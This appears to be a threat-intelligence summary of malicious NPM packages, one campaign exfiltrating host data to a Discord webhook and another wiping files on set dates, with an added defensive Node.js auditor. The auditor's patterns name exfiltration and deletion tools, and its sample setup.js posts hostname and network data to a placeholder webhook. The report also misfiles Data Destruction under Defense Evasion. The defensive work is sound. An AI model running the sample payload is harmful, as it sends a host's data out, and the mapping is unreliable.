Full Report
60 packages have been discovered in the NPM index that attempt to collect sensitive host and network data and send it to a Discord webhook controlled by the threat actor. [...]
Analysis Summary
# Tool/Technique: Malicious NPM Packages (Data Collection & Data Wiping Payloads)
## Overview
This entry summarizes findings related to two distinct campaigns involving malicious packages published on the Node Package Manager (NPM) registry. One set of packages was designed for host and network data exfiltration, while the other utilized destructive payloads, including file deletion capabilities, targeting specific JavaScript ecosystems.
## Technical Details
- Type: Malware (Specifically, malicious software distributed via software supply chain compromise)
- Platform: Target environments running Node.js, JavaScript frameworks (React, Vue.js, Vite), and end-user systems leveraging these packages.
- Capabilities:
  1. **Data Collection:** Collecting host and network information.
  2. **Data Destruction/Wiping:** Deleting files, corrupting data, and sabotaging browser storage mechanisms.
- First Seen: Not explicitly stated, but one campaign's packages existed for the past two years.
## MITRE ATT&CK Mapping
The activity described maps primarily to Supply Chain Compromise and Execution tactics:
- **TA0001 - Initial Access**
  - **T1195 - Supply Chain Compromise**
    - T1195.002 - Compromise Software Supply Chain: Compromising a repository like NPM to inject malicious code.
- **TA0002 - Execution**
  - **T1059 - Command and Scripting Interpreter** (If the packages execute arbitrary code upon installation/use)
- **TA0010 - Exfiltration** (For the data collection packages)
  - **T1041 - Exfiltration Over C2 Channel**
- **TA0005 - Defense Evasion**
  - **T1485 - Data Destruction** (For the wiping packages)
## Functionality
### Core Capabilities
**Data Collection Campaign:**
* Collects host details.
* Collects network data.
* Package names were frequently typosquats of, or otherwise closely resembled, legitimate packages (e.g., 'flipper-plugins', 'react-xterm2', 'hermes-inspector-msggen').
**Data Wiping Campaign (Actor 'xuxingfeng'):**
* Targets React, Vue.js, Vite, Node.js, and Quill ecosystems.
* Payloads were time-delayed, activating based on hardcoded system dates (e.g., script designed to delete Vue.js-related files on June 19–30, 2023).
* Progressively destroys framework files.
* Corrupts core JavaScript methods.
* Sabotages browser storage mechanisms.
### Advanced Features
* **Social Engineering/Trust Building:** Using names similar to legitimate packages to trick developers (typosquatting or generic names).
* **Time-Delayed Execution:** The destructive payloads were designed to evade detection over a long period by activating only on specific dates, suggesting premeditated, timed sabotage.
## Indicators of Compromise
* File Hashes: [Not provided in the context]
* File Names: Malicious packages observed on NPM (specific names varied, including 'flipper-plugins', 'react-xterm2', 'hermes-inspector-msggen', and eight packages associated with the actor 'xuxingfeng').
* Registry Keys: [Not applicable/provided]
* Network Indicators: [Not detailed; the focus is on the package distribution mechanism. The data collection behavior implies outbound C2 communication, reported as a Discord webhook controlled by the threat actor.]
* Behavioral Indicators: Arbitrary code execution upon package installation/usage within a Node.js project; file system modifications (deletion/corruption) triggered by system date checks.
## Associated Threat Actors
* The threat actor behind the destructive campaign is identified by the NPM publishing name: **'xuxingfeng'**.
* The actor behind the data collection campaign is unnamed in the summary.
## Detection Methods
* Signature-based detection: Checking dependencies against known malicious package manifests or names.
* Behavioral detection: Monitoring installation scripts (`postinstall`) or initial execution routines of new NPM dependencies for suspicious file system access or network connections.
* YARA rules: [Not provided in the context]
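As an added illustration of the behavioral detection method above (not code from the original report), the following Node.js snippet audits a package manifest for lifecycle hooks and checks the hook command, or the script file it runs, for the behaviors the report describes: webhook exfiltration, host/network reconnaissance, file deletion, and date-gated logic. The hook names are real npm lifecycle events; the indicator patterns, `auditPackage`/`verdict` helpers and sample manifests are constructed for this example.

```javascript
// Added example, not from the original report. npm lifecycle events that run
// automatically on install; a dependency defining one deserves review on its own.
const LIFECYCLE_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];

// Constructed heuristics tied to the behaviours described in the report.
const SUSPICIOUS_PATTERNS = [
  { name: 'discord-webhook', re: /discord(?:app)?\.com\/api\/webhooks/i },
  { name: 'outbound-http', re: /\b(?:https?\.request|fetch|axios|curl|wget)\b/ },
  { name: 'host-recon', re: /\bos\.(?:hostname|networkInterfaces|userInfo)\b/ },
  { name: 'file-deletion', re: /\b(?:rimraf|rm\s+-rf|fs\.(?:rm|rmSync|unlinkSync|rmdirSync))\b/ },
  { name: 'date-gated', re: /new Date\(\)[^;]*\.(?:getMonth|getDate|getFullYear)\(\)/ },
];

// Audit one package.json (as a string). `scriptSources` maps file names referenced
// by `node <file>` hooks to their source text so the script body itself is inspected.
function auditPackage(manifestJson, scriptSources = {}) {
  const scripts = JSON.parse(manifestJson).scripts || {};
  const findings = [];
  for (const hook of LIFECYCLE_HOOKS) {
    if (!(hook in scripts)) continue;
    const cmd = scripts[hook];
    findings.push({ hook, indicator: 'lifecycle-hook', detail: cmd });
    const ref = /^node\s+(\S+)/.exec(cmd);
    const body = ref && scriptSources[ref[1]] ? scriptSources[ref[1]] : cmd;
    for (const { name, re } of SUSPICIOUS_PATTERNS) {
      const hit = re.exec(body);
      if (hit) findings.push({ hook, indicator: name, detail: hit[0] });
    }
  }
  return findings;
}

// 'block' when a hook matches a suspicious pattern, 'review' when a hook merely exists.
function verdict(findings) {
  if (findings.some((f) => f.indicator !== 'lifecycle-hook')) return 'block';
  return findings.length ? 'review' : 'clean';
}

// Constructed sample: a postinstall hook whose script gathers host data for a webhook.
const SAMPLE_MANIFEST = JSON.stringify({
  name: 'example-lookalike', version: '1.0.0', scripts: { postinstall: 'node setup.js' },
});
const SAMPLE_SCRIPTS = {
  'setup.js': "const os = require('os');\n" +
    "const info = { host: os.hostname(), nics: os.networkInterfaces() };\n" +
    "fetch('https://discord.com/api/webhooks/PLACEHOLDER', { method: 'POST', body: JSON.stringify(info) });",
};

console.log(verdict(auditPackage(SAMPLE_MANIFEST, SAMPLE_SCRIPTS)), auditPackage(SAMPLE_MANIFEST, SAMPLE_SCRIPTS));
```

In a CI pipeline the same function can be run over every `node_modules/*/package.json` after `npm ci`, with `review` verdicts routed to a human and `block` verdicts failing the build.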
## Mitigation Strategies
* Immediately remove any installed packages identified as malicious from project dependencies.
* Perform a full system scan upon discovering their installation to eradicate remnants.
* Implement strict dependency checking and approval workflows for packages, especially those with high download counts or unknown authors.
* Monitor source code integrity post-build/post-install for anomalous file access.
## Related Tools/Techniques
* Software Supply Chain Compromise (General technique).
* Typosquatting attacks targeting popular public repositories (e.g., PyPI, RubyGems, NPM).
* Other destructive malware utilizing time-based triggers.